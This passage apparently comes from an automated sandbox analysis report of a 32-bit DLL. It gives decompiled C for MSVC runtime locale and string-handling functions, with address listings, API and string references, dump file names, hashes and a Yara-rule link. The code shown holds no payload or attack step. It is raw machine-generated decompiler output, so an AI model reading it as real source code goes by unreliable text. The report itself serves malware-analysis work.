							 *((intOrPtr*)(_t84 + 4)) = 0;
							_v8 = 9;
							 *_t84 = 0x6da74e30;
							E6DA5F9AF(_t79, _t84);
							E6DA58F4F(_t100,  &_v120);
							 *((intOrPtr*)(_t84 + 8)) = 0;
							 *((intOrPtr*)(_t84 + 0x10)) = 0;
							 *((intOrPtr*)(_t84 + 0x14)) = 0;
							_v76 = _t84;
							_v8 = 0xa;
							E6DA58F4F(_t100,  &_v164);
							_push(1);
							_push(1);
							_t64 = E6DA5DD0F();
							_t94 = _t94 + 0x18;
							if(_t64 == 0) {
								L13:
								E6DA5882C(__eflags);
								goto L14;
							} else {
								_push(1);
								_push(6);
								 *_t64 = 0;
								 *((intOrPtr*)(_t84 + 8)) = _t64;
								_t77 = E6DA5DD0F();
								_t94 = _t94 + 8;
								if(_t77 == 0) {
									L14:
									E6DA5882C(__eflags);
									goto L15;
								} else {
									_t66 =  *((intOrPtr*)("false")); // 0x736c6166
									 *_t77 = _t66;
									_t67 =  *0x6da7f2f4; // 0x65
									_push(1);
									_push(5);
									 *((short*)(_t77 + 4)) = _t67;
									 *((intOrPtr*)(_t84 + 0x10)) = _t77;
									_t77 = E6DA5DD0F();
									_t94 = _t94 + 8;
									if(_t77 == 0) {
										L15:
										_t54 = E6DA5882C(__eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t84);
										_t85 =  *_t77;
										__eflags = _t85;
										if(_t85 != 0) {
											E6DA5DCF4( *((intOrPtr*)(_t85 + 8)));
											E6DA5DCF4( *((intOrPtr*)(_t85 + 0x10)));
											_t54 = E6DA5DCF4( *((intOrPtr*)(_t85 + 0x14)));
										}
										return _t54;
									} else {
										_t69 = "true"; // 0x65757274
										 *_t77 = _t69;
										_t70 =  *0x6da7f2fc; // 0x0
										 *((char*)(_t77 + 4)) = _t70;
										 *((intOrPtr*)(_t84 + 0x14)) = _t77;
										 *((short*)(_t84 + 0xc)) = 0x2c2e;
										 *_t73 = _t84;
										E6DA529E0( &_v72);
										goto L11;
									}
								}
							}
						}
					}
				}
			}

0x6da562f3
0x6da562f5
0x6da56300
0x6da56301
0x6da56308
0x6da5630f
0x6da56316
0x6da5631b
0x6da5647a
0x6da56483
0x6da5648d
0x6da56321
0x6da56321
0x6da56324
0x00000000
0x6da5632a
0x6da5632a
0x6da5632b
0x6da56333
0x6da56335
0x6da56338
0x6da5633b
0x6da5633e
0x6da56345
0x6da56345
0x6da5634a
0x6da56358
0x6da5634c
0x6da5634c
0x6da56351
0x6da56353
0x6da56353
0x6da56353
0x6da56351
0x6da5635f
0x6da56362
0x6da56367
0x6da5636e
0x6da56372
0x6da56379
0x6da5637f
0x6da56386
0x6da5638a
0x6da5638d
0x6da56391
0x6da56394
0x6da56397
0x6da5639a
0x6da5639d
0x6da563a1
0x6da563a3
0x6da56493
0x00000000
0x6da563a9
0x6da563ae
0x6da563b3
0x6da563ba
0x6da563c1
0x6da563c8
0x6da563ce
0x6da563d7
0x6da563dc
0x6da563e3
0x6da563ea
0x6da563f1
0x6da563fa
0x6da563ff
0x6da56404
0x6da56406
0x6da56408
0x6da5640d
0x6da56412
0x6da56498
0x6da56498
0x00000000
0x6da56418
0x6da56418
0x6da5641a
0x6da5641c
0x6da5641f
0x6da56427
0x6da56429
0x6da5642e
0x6da5649d
0x6da5649d
0x00000000
0x6da56430
0x6da56430
0x6da56435
0x6da56437
0x6da5643d
0x6da5643f
0x6da56441
0x6da56445
0x6da5644d
0x6da5644f
0x6da56454
0x6da564a2
0x6da564a2
0x6da564a7
0x6da564a8
0x6da564a9
0x6da564aa
0x6da564ab
0x6da564ac
0x6da564ad
0x6da564ae
0x6da564af
0x6da564b0
0x6da564b1
0x6da564b3
0x6da564b5
0x6da564ba
0x6da564c2
0x6da564ca
0x6da564cf
0x6da564d3
0x6da56456
0x6da56456
0x6da5645b
0x6da5645d
0x6da56462
0x6da56465
0x6da56468
0x6da56471
0x6da56473
0x00000000
0x6da56479
0x6da56454
0x6da5642e
0x6da56412
0x6da563a3
0x6da56324

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DA56362
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DA563AE
Concurrency::cancel_current_task.LIBCPMT ref: 6DA56498
Concurrency::cancel_current_task.LIBCPMT ref: 6DA5649D
Concurrency::cancel_current_task.LIBCPMT ref: 6DA564A2

Strings

false, xrefs: 6DA56430
bad locale name, xrefs: 6DA5648E
true, xrefs: 6DA56456

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: 892caf7430e7b62129b7b1ff4b7fbd024bde75a63227dcc9f8101a5fb3551431
Instruction ID: 465258691edd8474b7e7e9fa4739934d841fad27343e8702a8d8f732dc98ce63
Opcode Fuzzy Hash: 892caf7430e7b62129b7b1ff4b7fbd024bde75a63227dcc9f8101a5fb3551431
Instruction Fuzzy Hash: E951CD74909305EFDB20CFA4CA40B9EBBB0AF05708F18845DE518AB380D7B99695CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6DA55C00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E6DA55C00(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8) {
				signed int _v0;
				signed int _v4;
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				char _v36;
				signed int _v40;
				short _v44;
				signed int _v48;
				short _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v96;
				signed int _v108;
				char _v116;
				signed int _v120;
				signed int _v132;
				signed int _v136;
				signed int _v148;
				intOrPtr _v156;
				signed int _v168;
				signed int _t175;
				void* _t184;
				void* _t200;
				signed int _t203;
				unsigned int _t205;
				void* _t206;
				signed int _t221;
				signed int _t223;
				signed int _t224;
				unsigned int _t226;
				void* _t227;
				signed int _t230;
				signed int _t245;
				signed int _t247;
				signed int _t248;
				unsigned int _t250;
				void* _t251;
				signed int _t265;
				signed int _t267;
				void* _t270;
				signed int _t275;
				signed int _t276;
				void* _t283;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed int _t293;
				signed int* _t295;
				signed int* _t296;
				signed int* _t297;
				signed int _t306;
				signed int* _t312;
				signed int _t318;
				void* _t320;
				void* _t327;
				void* _t329;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t343;
				signed int _t345;
				signed int _t346;
				unsigned int _t348;
				signed int _t349;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t365;
				intOrPtr _t366;
				signed int _t368;
				unsigned int _t369;
				signed int _t370;
				signed int _t372;
				signed int _t376;
				signed int _t377;
				signed int _t379;
				signed int _t382;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				signed int _t390;
				void* _t392;
				void* _t393;
				signed int _t401;
				void* _t402;
				signed int _t404;
				void* _t405;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t428;

				_t388 = _t401;
				_push(0xffffffff);
				_push(E6DA7265C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t401;
				_t402 = _t401 - 0x3c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				E6DA588D6( &_v24, 0);
				_v8 = 0;
				_t343 =  *0x6daa5cb4; // 0x0
				_t291 =  *0x6daa5c7c; // 0x0
				if(_t343 == 0) {
					E6DA588D6( &_v20, _t343);
					_t428 =  *0x6daa5cb4 - _t343; // 0x0
					if(_t428 == 0) {
						_t288 =  *0x6daa5048; // 0x0
						_t289 = _t288 + 1;
						 *0x6daa5048 = _t289;
						 *0x6daa5cb4 = _t289;
					}
					E6DA5892E( &_v20);
					_t343 =  *0x6daa5cb4; // 0x0
				}
				_t306 =  *(_a4 + 4);
				if(_t343 >=  *((intOrPtr*)(_t306 + 0xc))) {
					_t360 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t360 =  *( *((intOrPtr*)(_t306 + 8)) + _t343 * 4);
					if(_t360 == 0) {
						L8:
						__eflags =  *((char*)(_t306 + 0x14));
						if( *((char*)(_t306 + 0x14)) == 0) {
							L11:
							__eflags = _t360;
							if(_t360 != 0) {
								goto L6;
							} else {
								goto L12;
							}
						} else {
							_t283 = E6DA58AB3();
							__eflags = _t343 -  *((intOrPtr*)(_t283 + 0xc));
							if(_t343 >=  *((intOrPtr*)(_t283 + 0xc))) {
								L12:
								__eflags = _t291;
								if(__eflags == 0) {
									_t360 = E6DA59399(_t343, _t360, __eflags, 8);
									_t404 = _t402 + 4;
									_v20 = _t360;
									_t175 =  *(_a4 + 4);
									__eflags = _t175;
									if(_t175 == 0) {
										_t345 = 0x6da7f2c7;
									} else {
										_t345 =  *(_t175 + 0x18);
										__eflags = _t345;
										if(_t345 == 0) {
											_t345 = _t175 + 0x1c;
										}
									}
									E6DA588D6( &_v76, 0);
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									_v56 = 0;
									_v52 = 0;
									_v48 = 0;
									_v44 = 0;
									_v40 = 0;
									_v36 = 0;
									_v32 = 0;
									_v28 = 0;
									_v8 = 8;
									__eflags = _t345;
									if(_t345 == 0) {
										E6DA58889("bad locale name");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t388);
										_t390 = _t404;
										_push(0xffffffff);
										_push(E6DA72685);
										_push( *[fs:0x0]);
										 *[fs:0x0] = _t404;
										_t405 = _t404 - 0xc;
										_push(_t291);
										_push(_t360);
										_push(_t345);
										E6DA588D6( &_v116, 0);
										_v96 = 0;
										_t346 =  *0x6daa5cb8; // 0x0
										_t293 =  *0x6daa5c78; // 0x0
										_v108 = _t293;
										__eflags = _t346;
										if(_t346 == 0) {
											E6DA588D6( &_v28, _t346);
											__eflags =  *0x6daa5cb8 - _t346; // 0x0
											if(__eflags == 0) {
												_t275 =  *0x6daa5048; // 0x0
												_t276 = _t275 + 1;
												__eflags = _t276;
												 *0x6daa5048 = _t276;
												 *0x6daa5cb8 = _t276;
											}
											E6DA5892E( &_v28);
											_t346 =  *0x6daa5cb8; // 0x0
										}
										_t312 =  *(_v0 + 4);
										__eflags = _t346 - _t312[3];
										if(_t346 >= _t312[3]) {
											_t362 = 0;
											__eflags = 0;
											goto L29;
										} else {
											_t362 =  *(_t312[2] + _t346 * 4);
											__eflags = _t362;
											if(_t362 != 0) {
												L37:
												E6DA5892E( &_v32);
												 *[fs:0x0] = _v20;
												return _t362;
											} else {
												L29:
												__eflags = _t312[5];
												if(_t312[5] == 0) {
													L32:
													__eflags = _t362;
													if(_t362 != 0) {
														goto L37;
													} else {
														goto L33;
													}
												} else {
													_t270 = E6DA58AB3();
													__eflags = _t346 -  *((intOrPtr*)(_t270 + 0xc));
													if(_t346 >=  *((intOrPtr*)(_t270 + 0xc))) {
														L33:
														__eflags = _t293;
														if(_t293 == 0) {
															_t184 = E6DA562F0(_t293, _t346,  &_v24, _v0);
															_t407 = _t405 + 8;
															__eflags = _t184 - 0xffffffff;
															if(__eflags == 0) {
																E6DA52950();
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t390);
																_t392 = _t407;
																_t408 = _t407 - 8;
																_push(_t293);
																_t295 = _t312;
																_t315 = 0x7fffffff;
																_push(_t362);
																_t364 = _v120;
																_t338 = _t295[4];
																_v132 = _t338;
																_push(_t346);
																__eflags = 0x7fffffff - _t338 - _t364;
																if(__eflags < 0) {
																	E6DA514C0(_t295, 0x7fffffff, _t338, __eflags);
																	goto L60;
																} else {
																	_t346 = _t295[5];
																	_t248 = _t338 + _t364;
																	_v20 = _t248;
																	_t382 = _t248 | 0x0000000f;
																	_v4 = _t346;
																	__eflags = _t382 - 0x7fffffff;
																	if(__eflags <= 0) {
																		_t250 = _t346 >> 1;
																		_t315 = 0x7fffffff - _t250;
																		__eflags = _t346 - _t315;
																		if(__eflags <= 0) {
																			_t251 = _t250 + _t346;
																			__eflags = _t382 - _t251;
																			_t364 =  <  ? _t251 : _t382;
																			_t77 = _t364 + 1; // 0x80000000
																			_t315 = _t77;
																			__eflags = _t315 - 0x1000;
																			if(_t315 < 0x1000) {
																				__eflags = _t315;
																				if(__eflags == 0) {
																					_t346 = 0;
																					__eflags = 0;
																				} else {
																					_t265 = E6DA59399(_t346, _t364, __eflags, _t315);
																					_t338 = _v16;
																					_t408 = _t408 + 4;
																					_t346 = _t265;
																				}
																				goto L53;
																			} else {
																				_t78 =  &(_t315[8]); // 0x80000023
																				_t266 = _t78;
																				__eflags = _t78 - _t315;
																				if(__eflags <= 0) {
																					L60:
																					E6DA51420();
																					goto L61;
																				} else {
																					goto L43;
																				}
																			}
																		} else {
																			_t364 = 0x7fffffff;
																			goto L42;
																		}
																	} else {
																		_t364 = 0x7fffffff;
																		L42:
																		_t266 = 0x80000023;
																		L43:
																		_t267 = E6DA59399(_t346, _t364, __eflags, _t266);
																		_t408 = _t408 + 4;
																		__eflags = _t267;
																		if(_t267 == 0) {
																			L61:
																			E6DA5DACF(_t295, _t315, _t338);
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			_push(_t392);
																			_t393 = _t408;
																			_t409 = _t408 - 0xc;
																			_t339 = _v136;
																			_push(_t295);
																			_t296 = _t315;
																			_t316 = 0x7fffffff;
																			_push(_t364);
																			_push(_t346);
																			_t365 = _t296[4];
																			_v148 = _t365;
																			__eflags = 0x7fffffff - _t365 - _t339;
																			if(__eflags < 0) {
																				E6DA514C0(_t296, 0x7fffffff, _t339, __eflags);
																				goto L83;
																			} else {
																				_t346 = _t296[5];
																				_t224 = _t365 + _t339;
																				_v24 = _t224;
																				_t376 = _t224 | 0x0000000f;
																				_v8 = _t346;
																				__eflags = _t376 - 0x7fffffff;
																				if(__eflags <= 0) {
																					_t226 = _t346 >> 1;
																					_t316 = 0x7fffffff - _t226;
																					__eflags = _t346 - _t316;
																					if(__eflags <= 0) {
																						_t227 = _t226 + _t346;
																						__eflags = _t376 - _t227;
																						_t365 =  <  ? _t227 : _t376;
																						_t107 = _t365 + 1; // 0x80000000
																						_t316 = _t107;
																						__eflags = _t316 - 0x1000;
																						if(_t316 < 0x1000) {
																							__eflags = _t316;
																							if(__eflags == 0) {
																								_t346 = 0;
																								__eflags = 0;
																							} else {
																								_t245 = E6DA59399(_t346, _t365, __eflags, _t316);
																								_t409 = _t409 + 4;
																								_t346 = _t245;
																							}
																							goto L76;
																						} else {
																							_t108 = _t316 + 0x23; // 0x80000023
																							_t246 = _t108;
																							__eflags = _t108 - _t316;
																							if(__eflags <= 0) {
																								L83:
																								E6DA51420();
																								goto L84;
																							} else {
																								goto L66;
																							}
																						}
																					} else {
																						_t365 = 0x7fffffff;
																						goto L65;
																					}
																				} else {
																					_t365 = 0x7fffffff;
																					L65:
																					_t246 = 0x80000023;
																					L66:
																					_t247 = E6DA59399(_t346, _t365, __eflags, _t246);
																					_t409 = _t409 + 4;
																					__eflags = _t247;
																					if(_t247 == 0) {
																						L84:
																						E6DA5DACF(_t296, _t316, _t339);
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t393);
																						_t410 = _t409 - 8;
																						_push(_t296);
																						_t297 = _t316;
																						_t317 = 0x7fffffff;
																						_push(_t365);
																						_t366 = _v156;
																						_t340 = _t297[4];
																						_v168 = _t340;
																						_push(_t346);
																						__eflags = 0x7fffffff - _t340 - _t366;
																						if(__eflags < 0) {
																							E6DA514C0(_t297, 0x7fffffff, _t340, __eflags);
																							goto L106;
																						} else {
																							_t348 = _t297[5];
																							_t203 = _t340 + _t366;
																							_v28 = _t203;
																							_t368 = _t203 | 0x0000000f;
																							_v12 = _t348;
																							__eflags = _t368 - 0x7fffffff;
																							if(__eflags <= 0) {
																								_t205 = _t348 >> 1;
																								_t317 = 0x7fffffff - _t205;
																								__eflags = _t348 - _t317;
																								if(__eflags <= 0) {
																									_t206 = _t205 + _t348;
																									__eflags = _t368 - _t206;
																									_t369 =  <  ? _t206 : _t368;
																									_t146 = _t369 + 1; // 0x80000000
																									_t317 = _t146;
																									__eflags = _t317 - 0x1000;
																									if(_t317 < 0x1000) {
																										__eflags = _t317;
																										if(__eflags == 0) {
																											_t349 = 0;
																											__eflags = 0;
																										} else {
																											_t221 = E6DA59399(_t348, _t369, __eflags, _t317);
																											_t340 = _v24;
																											_t410 = _t410 + 4;
																											_t349 = _t221;
																										}
																										goto L99;
																									} else {
																										_t147 = _t317 + 0x23; // 0x80000023
																										_t222 = _t147;
																										__eflags = _t147 - _t317;
																										if(__eflags <= 0) {
																											L106:
																											E6DA51420();
																											goto L107;
																										} else {
																											goto L89;
																										}
																									}
																								} else {
																									_t369 = 0x7fffffff;
																									goto L88;
																								}
																							} else {
																								_t369 = 0x7fffffff;
																								L88:
																								_t222 = 0x80000023;
																								L89:
																								_t223 = E6DA59399(_t348, _t369, __eflags, _t222);
																								_t410 = _t410 + 4;
																								__eflags = _t223;
																								if(_t223 == 0) {
																									L107:
																									_t200 = E6DA5DACF(_t297, _t317, _t340);
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_t318 =  *_t317;
																									__eflags = _t318;
																									if(_t318 != 0) {
																										return  *((intOrPtr*)( *_t318))(1);
																									}
																									return _t200;
																								} else {
																									_t340 = _v24;
																									_t144 = _t223 + 0x23; // 0x23
																									_t349 = _t144 & 0xffffffe0;
																									 *(_t349 - 4) = _t223;
																									L99:
																									_t297[4] = _v28;
																									_t297[5] = _t369;
																									_t370 = _t349 + _t340;
																									_v28 = _t370;
																									__eflags = _v12 - 0x10;
																									_v24 = _v4 + _t370;
																									_push(_t340);
																									if(_v12 < 0x10) {
																										_push(_t297);
																										_push(_t349);
																										E6DA5AB10();
																										E6DA5B0A0(_t349, _t370, _v0, _v4);
																										 *_v24 = 0;
																										 *_t297 = _t349;
																										return _t297;
																									} else {
																										_t372 =  *_t297;
																										_push(_t372);
																										_push(_t349);
																										E6DA5AB10();
																										E6DA5B0A0(_t349, _v28, _v0, _v4);
																										_t320 = _v12 + 1;
																										 *_v24 = 0;
																										__eflags = _t320 - 0x1000;
																										if(_t320 < 0x1000) {
																											L103:
																											_push(_t320);
																											E6DA593C9(_t372);
																											 *_t297 = _t349;
																											return _t297;
																										} else {
																											_t340 =  *(_t372 - 4);
																											_t317 = _t320 + 0x23;
																											_t165 = _t372 - _t340 - 4; // 0x7ffffffb
																											__eflags = _t165 - 0x1f;
																											if(_t165 > 0x1f) {
																												goto L107;
																											} else {
																												_t372 = _t340;
																												goto L103;
																											}
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t105 = _t247 + 0x23; // 0x23
																						_t346 = _t105 & 0xffffffe0;
																						 *(_t346 - 4) = _t247;
																						L76:
																						_t296[4] = _v24;
																						_t230 = _v0;
																						_t296[5] = _t365;
																						_v20 = _v20 - _t230 + 1;
																						_t377 = _t346 + _t230;
																						_v28 = _t377;
																						__eflags = _v8 - 0x10;
																						_v24 = _a4 + _t377;
																						_push(_t230);
																						if(_v8 < 0x10) {
																							_push(_t296);
																							_push(_t346);
																							E6DA5AB10();
																							E6DA5B0A0(_t346, _t377, _a8, _a4);
																							__eflags = _t296 + _v0;
																							E6DA5AB10(_v24, _t296 + _v0, _v20);
																							 *_t296 = _t346;
																							return _t296;
																						} else {
																							_t379 =  *_t296;
																							_push(_t379);
																							_push(_t346);
																							E6DA5AB10();
																							E6DA5B0A0(_t346, _v28, _a8, _a4);
																							E6DA5AB10(_v24, _v0 + _t379, _v20);
																							_t409 = _t409 + 0x24;
																							_t327 = _v8 + 1;
																							__eflags = _t327 - 0x1000;
																							if(_t327 < 0x1000) {
																								L80:
																								_push(_t327);
																								E6DA593C9(_t379);
																								 *_t296 = _t346;
																								return _t296;
																							} else {
																								_t339 =  *(_t379 - 4);
																								_t316 = _t327 + 0x23;
																								_t365 = _t379 - _t339;
																								_t130 = _t365 - 4; // 0x7ffffffb
																								__eflags = _t130 - 0x1f;
																								if(_t130 > 0x1f) {
																									goto L84;
																								} else {
																									_t379 = _t339;
																									goto L80;
																								}
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t338 = _v16;
																			_t75 = _t267 + 0x23; // 0x23
																			_t346 = _t75 & 0xffffffe0;
																			 *(_t346 - 4) = _t267;
																			L53:
																			_t295[4] = _v20;
																			_t295[5] = _t364;
																			_t383 = _t346 + _t338;
																			_v20 = _t383;
																			__eflags = _v4 - 0x10;
																			_v16 = _a8 + _t383;
																			_push(_t338);
																			if(_v4 < 0x10) {
																				_push(_t295);
																				_push(_t346);
																				E6DA5AB10();
																				E6DA5AB10(_t383, _a4, _a8);
																				 *_v16 = 0;
																				 *_t295 = _t346;
																				return _t295;
																			} else {
																				_t385 =  *_t295;
																				_push(_t385);
																				_push(_t346);
																				E6DA5AB10();
																				E6DA5AB10(_v20, _a4, _a8);
																				_t408 = _t408 + 0x18;
																				_t329 = _v4 + 1;
																				 *_v16 = 0;
																				__eflags = _t329 - 0x1000;
																				if(_t329 < 0x1000) {
																					L57:
																					_push(_t329);
																					E6DA593C9(_t385);
																					 *_t295 = _t346;
																					return _t295;
																				} else {
																					_t338 =  *(_t385 - 4);
																					_t315 = _t329 + 0x23;
																					_t364 = _t385 - _t338;
																					_t94 = _t364 - 4; // 0x7ffffffb
																					__eflags = _t94 - 0x1f;
																					if(_t94 > 0x1f) {
																						goto L61;
																					} else {
																						_t385 = _t338;
																						goto L57;
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t362 = _v24;
																_v0 = _t362;
																_v12 = 1;
																E6DA58A87(__eflags, _t362);
																 *((intOrPtr*)( *_t362 + 4))();
																 *0x6daa5c78 = _t362;
																goto L37;
															}
														} else {
															_t362 = _t293;
															goto L37;
														}
													} else {
														_t362 =  *( *((intOrPtr*)(_t270 + 8)) + _t346 * 4);
														goto L32;
													}
												}
											}
										}
									} else {
										E6DA58BB9( &_v76,  &_v76, _t345);
										 *((intOrPtr*)(_t360 + 4)) = 0;
										 *_t360 = 0x6da74e00;
										E6DA529E0( &_v76);
										_a4 = _t360;
										_v8 = 9;
										E6DA58A87(__eflags, _t360);
										 *((intOrPtr*)( *_t360 + 4))();
										 *0x6daa5c7c = _t360;
										goto L6;
									}
								} else {
									_t360 = _t291;
									goto L6;
								}
							} else {
								_t360 =  *( *((intOrPtr*)(_t283 + 8)) + _t343 * 4);
								goto L11;
							}
						}
					} else {
						L6:
						E6DA5892E( &_v24);
						 *[fs:0x0] = _v16;
						return _t360;
					}
				}
			}

0x6da55c01
0x6da55c03
0x6da55c05
0x6da55c10
0x6da55c11
0x6da55c18
0x6da55c1b
0x6da55c1c
0x6da55c1d
0x6da55c23
0x6da55c28
0x6da55c2f
0x6da55c35
0x6da55c3d
0x6da55c43
0x6da55c48
0x6da55c4e
0x6da55c50
0x6da55c55
0x6da55c56
0x6da55c5b
0x6da55c5b
0x6da55c63
0x6da55c68
0x6da55c68
0x6da55c71
0x6da55c77
0x6da55c9e
0x6da55c9e
0x00000000
0x6da55c79
0x6da55c7c
0x6da55c81
0x6da55ca0
0x6da55ca0
0x6da55ca4
0x6da55cb6
0x6da55cb6
0x6da55cb8
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55ca6
0x6da55ca6
0x6da55cab
0x6da55cae
0x6da55cba
0x6da55cba
0x6da55cbc
0x6da55cc9
0x6da55ccb
0x6da55cce
0x6da55cd4
0x6da55cd7
0x6da55cd9
0x6da55ce7
0x6da55cdb
0x6da55cdb
0x6da55cde
0x6da55ce0
0x6da55ce2
0x6da55ce2
0x6da55ce0
0x6da55cf1
0x6da55cf6
0x6da55cfd
0x6da55d01
0x6da55d08
0x6da55d0e
0x6da55d15
0x6da55d19
0x6da55d1c
0x6da55d20
0x6da55d23
0x6da55d26
0x6da55d29
0x6da55d2c
0x6da55d30
0x6da55d32
0x6da55d7d
0x6da55d82
0x6da55d83
0x6da55d84
0x6da55d85
0x6da55d86
0x6da55d87
0x6da55d88
0x6da55d89
0x6da55d8a
0x6da55d8b
0x6da55d8c
0x6da55d8d
0x6da55d8e
0x6da55d8f
0x6da55d90
0x6da55d91
0x6da55d93
0x6da55d95
0x6da55da0
0x6da55da1
0x6da55da8
0x6da55dab
0x6da55dac
0x6da55dad
0x6da55db3
0x6da55db8
0x6da55dbf
0x6da55dc5
0x6da55dcb
0x6da55dce
0x6da55dd0
0x6da55dd6
0x6da55ddb
0x6da55de1
0x6da55de3
0x6da55de8
0x6da55de8
0x6da55de9
0x6da55dee
0x6da55dee
0x6da55df6
0x6da55dfb
0x6da55dfb
0x6da55e04
0x6da55e07
0x6da55e0a
0x6da55e18
0x6da55e18
0x00000000
0x6da55e0c
0x6da55e0f
0x6da55e12
0x6da55e14
0x6da55e70
0x6da55e73
0x6da55e80
0x6da55e8a
0x6da55e16
0x6da55e1a
0x6da55e1a
0x6da55e1e
0x6da55e30
0x6da55e30
0x6da55e32
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55e20
0x6da55e20
0x6da55e25
0x6da55e28
0x6da55e34
0x6da55e34
0x6da55e36
0x6da55e43
0x6da55e48
0x6da55e4b
0x6da55e4e
0x6da55e8b
0x6da55e90
0x6da55e91
0x6da55e92
0x6da55e93
0x6da55e94
0x6da55e95
0x6da55e96
0x6da55e97
0x6da55e98
0x6da55e99
0x6da55e9a
0x6da55e9b
0x6da55e9c
0x6da55e9d
0x6da55e9e
0x6da55e9f
0x6da55ea0
0x6da55ea1
0x6da55ea3
0x6da55ea6
0x6da55ea7
0x6da55ea9
0x6da55eb0
0x6da55eb1
0x6da55eb4
0x6da55eb9
0x6da55ebc
0x6da55ebd
0x6da55ebf
0x6da55fe2
0x00000000
0x6da55ec5
0x6da55ec5
0x6da55ec8
0x6da55ecd
0x6da55ed0
0x6da55ed3
0x6da55ed6
0x6da55ed8
0x6da55f02
0x6da55f04
0x6da55f06
0x6da55f08
0x6da55f11
0x6da55f13
0x6da55f15
0x6da55f18
0x6da55f18
0x6da55f1b
0x6da55f21
0x6da55f30
0x6da55f32
0x6da55f44
0x6da55f44
0x6da55f34
0x6da55f35
0x6da55f3a
0x6da55f3d
0x6da55f40
0x6da55f40
0x00000000
0x6da55f23
0x6da55f23
0x6da55f23
0x6da55f26
0x6da55f28
0x6da55fe7
0x6da55fe7
0x00000000
0x6da55f2e
0x00000000
0x6da55f2e
0x6da55f28
0x6da55f0a
0x6da55f0a
0x00000000
0x6da55f0a
0x6da55eda
0x6da55eda
0x6da55edc
0x6da55edc
0x6da55ee1
0x6da55ee2
0x6da55ee7
0x6da55eea
0x6da55eec
0x6da55fec
0x6da55fec
0x6da55ff1
0x6da55ff2
0x6da55ff3
0x6da55ff4
0x6da55ff5
0x6da55ff6
0x6da55ff7
0x6da55ff8
0x6da55ff9
0x6da55ffa
0x6da55ffb
0x6da55ffc
0x6da55ffd
0x6da55ffe
0x6da55fff
0x6da56000
0x6da56001
0x6da56003
0x6da56006
0x6da56009
0x6da5600a
0x6da5600c
0x6da56011
0x6da56014
0x6da56015
0x6da5601a
0x6da5601d
0x6da5601f
0x6da56165
0x00000000
0x6da56025
0x6da56025
0x6da56028
0x6da5602d
0x6da56030
0x6da56033
0x6da56036
0x6da56038
0x6da5605f
0x6da56061
0x6da56063
0x6da56065
0x6da5606e
0x6da56070
0x6da56072
0x6da56075
0x6da56075
0x6da56078
0x6da5607e
0x6da5608d
0x6da5608f
0x6da5609e
0x6da5609e
0x6da56091
0x6da56092
0x6da56097
0x6da5609a
0x6da5609a
0x00000000
0x6da56080
0x6da56080
0x6da56080
0x6da56083
0x6da56085
0x6da5616a
0x6da5616a
0x00000000
0x6da5608b
0x00000000
0x6da5608b
0x6da56085
0x6da56067
0x6da56067
0x00000000
0x6da56067
0x6da5603a
0x6da5603a
0x6da5603c
0x6da5603c
0x6da56041
0x6da56042
0x6da56047
0x6da5604a
0x6da5604c
0x6da5616f
0x6da5616f
0x6da56174
